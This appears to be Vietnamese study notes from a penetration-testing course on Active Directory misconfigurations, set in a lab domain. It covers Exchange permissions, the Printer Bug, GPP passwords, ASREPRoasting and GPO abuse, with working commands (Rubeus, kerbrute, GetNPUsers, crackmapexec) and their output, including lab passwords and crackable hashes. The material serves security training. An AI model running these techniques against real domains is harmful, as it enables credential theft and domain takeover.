Miscellaneous Misconfigurations

Khi cài đặt Microsoft Exchange và AD theo default installation, Exchange sẽ được cấp những quyền hạn cao để tương tác với user và các object khác để vận hành hệ thống, do vậy đã tạo ra nhiều attack surface cho attacker.

Tự tạo nhiều group, user, service account, computer với quyền rất cao trong domain.
Các nhóm này có ACE/ACL đặc biệt cho phép write domain object.
Không có mô hình split-administration, nên Exchange gần như trở thành Domain Admin gián tiếp.

Exchange Windows Permissions

Vấn đề của exchange là group này không nằm trong list của protected groups của Windows như Domain Admins, nhưng nó lại có quyền WriteDACL.

⇒ Member of group này có thể chỉnh sửa ACL của domain object, cụ thể:

Thêm quyền DS-Replication-Get-Changes
Thêm quyền DS-Replication-Get-Changes-All
Từ đó cấp DCSync cho bất kỳ user nào (đọc NTLM hash, Kerberos keys).

PrivExchange

PrivExchange là một kỹ thuật privilege escalation trong môi trường AD, khai thác từ Exchange Server để đạt quyền Domain Admin chỉ với một tài khoản domain user bình thường có mailbox.

CVE được liên quan: CVE-2018-8581

Lỗi xuất phát từ tính năng PushSubscription trong Exchange Web Services (EWS)/

Tính năng này cho phép:

Một user có mailbox tạo một "push subscription".
Exchange server (chạy dưới quyền SYSTEM) sẽ gửi HTTP request đến endpoint mà người dùng chỉ định để đẩy thông tin sự kiện mailbox.

⇒ Bất kỳ domain user nào có mailbox có thể yêu cầu Exchange server authenticate ra ngoài.

Printer Bug

Printer Bug coerce một host Windows Server chạy dịch vụ Print Spooler phải authenticate ra ngoài (SMB/NTLM) đến host của attacker.

Lỗ hổng nằm trong protocol MS-RPRN (Print System Remote Protocol) khi bất kì domain user nào connect đến spool RpcOpenPrinter bằng cách sử dụng RpcRemoteFindFirstPrinterChangeNotificationEx method và force server phải authenticate tới bất kì host nào do client yêu cầu qua SMB.

Spooler service chạy với quyền SYSTEM và được cài đặt default trên Windows servers running Desktop Experience.

Kết quả thu được:

Relay đến LDAP ⇒ cấp DCSync ⇒ Domain Admin
Relay đến LDAP ⇒ cấp RBCD (Resource-Based Constrained Delegation)
Cross-Forest Attack

Sử dụng NetNTLMtoSilverTicket và Security-Assessment để check host mục tiêu có dính MS-PRN Printer Bug hay không.

PS C:\htb> Import-Module .\SecurityAssessment.ps1
PS C:\htb> Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

ComputerName                        Status
------------                        ------
ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL   True

MS14-068

MS14-068 là một lỗ hổng trong Kerberos Key Distribution Center (KDC), cho phép Domain User tự tạo một PAC (Privilege Attribute Certificate) giả mạo, khai rằng mình là Domain Admin, và KDC sẽ chấp nhận PAC giả này là hợp lệ. KDC không kiểm tra đúng chữ ký PAC khi xử lý yêu cầu TGS, tạo điều kiện cho attacker đính kèm một PAC giả mạo, và KDC vẫn cấp TGS hợp lệ cho ticket đó.

Nói cách khác:

Không cần hash của Domain Admin
Không cần SIDHistory injection
Không cần chỉnh AD ACL
Chỉ cần Domain User

PAC fake mới khai báo chỉ cần thay đổi attribute group membership = Domain Admins, Enterprise Admins, …

Tham khảo pykek.

Enumerating DNS Records

Có thể sử dụng adidnsdump để enumerate toàn bộ record DNS trong AD chỉ với cred domain user hợp lệ.

Tham khảo: https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/

adidnsdump -u domain\\user ldap://<IP DC>

$> adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 

Password: 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records

Other Misconfigurations

Password in Description Field

PS C:\htb> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

samaccountname description
-------------- -----------
administrator  Built-in account for administering the computer/domain
guest          Built-in account for guest access to the computer/domain
krbtgt         Key Distribution Center Service Account
ldap.agent     *** DO NOT CHANGE ***  3/12/2012: Sunsh1ne4All!

Finding a Password in the Script

PS C:\htb> cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

On Error Resume Next
strComputer = "."
 
Set oShell = CreateObject("WScript.Shell") 
sUser = "Administrator"
sPwd = "!ILFREIGHT_L0cALADmin!"
 
Set Arg = WScript.Arguments
If  Arg.Count > 0 Then
sPwd = Arg(0) 'Pass the password as parameter to the script
End if
 
'Get the administrator name
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

<SNIP>

Group Policy Preferences (GPP) Passwords

Khi có GPP mới, một file .xml sẽ được tạo trong SYSVOL share, đồng thời cũng được lưu vào cached locally trên endpoint mà Group Policy áp dụng:

Map drives (drives.xml)
Tạo local users
Tạo printer config (printers.xml)
Tạo và update services (services.xml)
Tạo scheduled tasks (scheduledtasks.xml)
Thay đổi local admin passwords

Các tệp này chứa nhiều dữ liệu config nhạy cảm. Attribute cpassword được mã hóa AES-256 bit với private key được Microsoft public: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be, có thể sử dụng để decrypt password. Tất cả các domain user đều có thể đọc được các file này qua SYSVOL share.

Microsoft đã define lỗ hổng này và vá trong năm 2014 MS14-025 Vulnerability in GPP could allow elevation of privilege để ngăn administrator đặt password qua GPP. Patch này sẽ không xóa file Groups.xml có password từ SYSVOL. Nếu xóa GPP policy thay vì hủy liên kết OU, thì trên local computer vẫn còn.

Decrypt password sử dụng gpp-decrypt.

Crackmapexec cũng có hai module để locate và retrieve password.

crackmapexec smb -L | grep gpp

crackmapexec smb <DC IP> -u <user> -p <password> -M gpp_autologin

$> crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Passwords: ['ILFreightguardadmin!']

ASREPRoasting

ASREPRoasting là kĩ thuật cho phép bất kì domain user nào có thuộc tính "Do not require Kerberos pre-authentication" được bật có thể lấy được Ticket Granting Ticket (TGT) của bất kì user nào.

Những account này sẽ trả về một AS_REP (Authentication Service Reply) đã được encrypt bằng hash password của chính account đó, attack có thể sử dụng Hashcat hoặc John the Ripper dể crack offline.

ASREPRoasting cũng tương tự như Kerberoasting, nhưng là kiểu attack AS-REP hay vì TGS-REP. SPN không bắt buộc, setting này có thể enumerate với PowerView hoặc built-in PowerShell AD modules.

Ngoài ra có Ruberus để obtain ticket cho target account. Nếu attacker có quyền GenericWrite hoặc GenericAll đối với một account, có thể lấy AS-REP ticket và crack password offline.

PowerView enumerate user với UAC value có chứa DONT_REQ_PREAUTH.

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Retrieving AS-REP in Proper Format using Rubeus

.\Rubeus.exe asreproast /user:<user> /nowrap /format:hashcat

PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: AS-REP roasting

[*] Target User            : mmorgan
[*] Target Domain          : INLANEFREIGHT.LOCAL

[*] Searching path 'LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=mmorgan))'
[*] SamAccountName         : mmorgan
[*] DistinguishedName      : CN=Matthew Morgan,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
[*] Using domain controller: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL (172.16.5.5)
[*] Building AS-REQ (w/o preauth) for: 'INLANEFREIGHT.LOCAL\mmorgan'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
     [email protected]:D18650F4F4E0537E0188A6897A478C55$0978822DEC13046712DB7DC03F6C4DE059A946485451AAE98BB93DFF8E3E64F3AA5614160F21A029C2B9437CB16E5E9DA4A2870FEC0596B09BADA989D1F8057262EA40840E8D0F20313B4E9A40FA5E4F987FF404313227A7BFFAE748E07201369D48ABB4727DFE1A9F09D50D7EE3AA5C13E4433E0F9217533EE0E74B02EB8907E13A208340728F794ED5103CB3E5C7915BF2F449AFDA41988FF48A356BF2BE680A25931A8746A99AD3E757BFE097B852F72CEAE1B74720C011CFF7EC94CBB6456982F14DA17213B3B27DFA1AD4C7B5C7120DB0D70763549E5144F1F5EE2AC71DDFC4DCA9D25D39737DC83B6BC60E0A0054FC0FD2B2B48B25C6CA

Crack password bằng Hashcat với mode 18200.

Retrieving the AS-REP Using Kerbrute

Kerbrute với command userenum .

kerbrute userenum -d <domain> --dc <DC IP> <path to wordlist>

$> kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 13:14:17 >  Using KDC(s):
2022/04/01 13:14:17 >  	172.16.5.5:88

2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:	 [email protected]
2022/04/01 13:14:17 >  [+] mmorgan has no pre auth required. Dumping hash to crack offline:
[email protected]:400d306dda575be3d429aad39ec68a33$8698ee566cde591a7ddd1782db6f7ed8531e266befed4856b9fcbbdda83a0c9c5ae4217b9a43d322ef35a6a22ab4cbc86e55a1fa122a9f5cb22596084d6198454f1df2662cb00f513d8dc3b8e462b51e8431435b92c87d200da7065157a6b24ec5bc0090e7cf778ae036c6781cc7b94492e031a9c076067afc434aa98e831e6b3bff26f52498279a833b04170b7a4e7583a71299965c48a918e5d72b5c4e9b2ccb9cf7d793ef322047127f01fd32bf6e3bb5053ce9a4bf82c53716b1cee8f2855ed69c3b92098b255cc1c5cad5cd1a09303d83e60e3a03abee0a1bb5152192f3134de1c0b73246b00f8ef06c792626fd2be6ca7af52ac4453e6a

<SNIP>

Với list user hợp lệ, attacker có thể dùng Get-NPUsers.py từ Impacket để hunt tất cả user với Kerberos pre-authentication not required.

GetNPUsers.py <domnain>/ -dc-ip <DC IP> -no-pass -usersfile <path to wordlist user valid>

$> GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users 
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set

<SNIP>

Group Policy Object (GPO) Abuse

GPO misconfigurations có thể bị abuse để thực hiện các hành vi như:

Privilege Escalation

Attacker sẽ setting:

Computer Configuration ⇒ Windows Settings ⇒ Security Settings ⇒ Local Policies ⇒ User Rights Assignment.

Các quyền nhạy cảm:

SeDebugPrivilege ⇒ đọc/ghi process ⇒ SYSTEM
SeImpersonatePrivilege ⇒ JuicyPotato/PrintSpoofer ⇒ SYSTEM
SeTakeOwnershipPrivilege ⇒ chiếm quyền file/service ⇒ escalation

Add local admin user cho một hoặc nhiều hosts (Persistence)

Sửa Restricted Groups/Local Users and Groups thêm vào user mà attacker có được hoặc tạo user mới.

Create scheduled task

Attacker sẽ tạo scheduled task:

Computer Configuration Preferences ⇒ Control Panel Settings ⇒ Scheduled Tasks

Có thể enumerate thông tin GPO bằng cách sử dụng PowerView hoặc BloodHound.

group3r, ADRecon, PingCastle để audit GPO trong một domain.

PS C:\htb> Get-DomainGPO |select displayname

displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
Deny Control Panel Access
Disallow LM Hash
Deny CMD Access
Disable Forced Restarts
Block Removable Media
Disable Guest Account
Service Accounts Password Policy
Logon Banner
Disconnect Idle RDP
Disable NetBIOS
AutoLogon
GuardAutoLogon
Certificate Services

Nếu Group Policy Management Tools được cài đặt trên host, ta có thể sử dụng Get-GPO tham khảo GroupPolicy cmdlets.

Get-GPO -All | Select DisplayName

Enumerate quyền của domain user lên GPO

$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Domain user có nhiều quyền khác nhau cho GPO, ví dụ như WriteProperty và WriteDacl .

Convert GPO GUID to Name

Get-GPO -Guid <GUID>

Sử dụng SharpGPOAbuse để tận dụng lợi thế của GPO misconfiguration bằng các actions như add user và local admin group trên một affected hosts, tạo một immediate scheduled task cho việc reverse shell hoặc configure một malicious computer startup script.

PreviousBleeding Edge Vulnerabilities NextDomain Trusts Primer

Last updated 24 days ago

Exchange Related Group Membership